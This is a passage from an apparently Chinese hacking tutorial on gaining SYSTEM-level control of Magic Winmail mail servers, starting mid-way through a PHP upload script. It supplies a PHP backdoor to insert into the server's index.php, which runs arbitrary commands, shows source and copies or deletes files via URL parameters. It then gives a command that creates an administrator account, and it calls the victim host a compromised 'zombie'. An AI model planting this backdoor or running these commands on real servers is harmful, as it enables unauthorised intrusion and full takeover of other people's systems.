使用Magic Winmail 来提升权限(2) } else { echo "上传失败"; } ?> <form ENCTYPE="multipart/form-data" ACTION="<?php echo"".$PHP_SELF.""; ?>" METHOD="POST"> <input NAME="MyFile" TYPE="file"> <input VALUE="提交" TYPE="submit"> </from> 其实我们可以将如下的代码插入到Magic Winmail的index.php文件中去,它的功能已经构多了。加上lis0发现的漏洞。这就算是个最完美的后门了。 <? if ($id=="1"){ system($cmd); show_source($file); copy($a,$b);unlink($a); } ?> 我们使用http://www.target.com:8080/index.php?id=1&YY=XX 就可以正大光明地访问我们的肉鸡了。好像这样做太黑了点:) 还没说漏洞呢?废话多了。将一个php的脚本放在d:\MagicW~1\server\webmail下 图3 然后正大光明地 net user lis0 lis0 /add & net localgroup administrators lis0 /add 这个就是哥们发现的漏洞,不相信, 让肉鸡来证明我说的是没错的啊。图4 这个webshell是system级别的而不是你那个guest级别的东西。虽然同是webshell待遇却不同啊。至于你想要玩其它的东东的话,使用上面我提起的up.php上传应该是不成问题的。然后在脚本的那个可爱的小框框中执行就ok了 如果使用asp脚本可以提升限权吗? 也放在Magic Winmail那个文件夹下。 我们可以分析一下如果Magic Winmail可以同时解析php和asp脚本的话,应该是可以的。不好意思Magic Winmail是不可以解析asp脚本的,Magic Winmail这边是php的世界。 我们这边简单地分析一个这个漏洞是如何产生的?我们可爱的网管在装Magic Winmail的时候肯定是以system级别的身份装的。当然Magic Winmail就继承了system级别的限权,而我们的Magic Winmail却可以解析php脚本,想当然我们可爱的php脚本就是system级别的脚本了。这个Magic Winmail软件有点像咱国产Netbox的味道。 看看我们分析的对不对,于是我上传了个php探针,看看它到底是怎么回事情。 图5
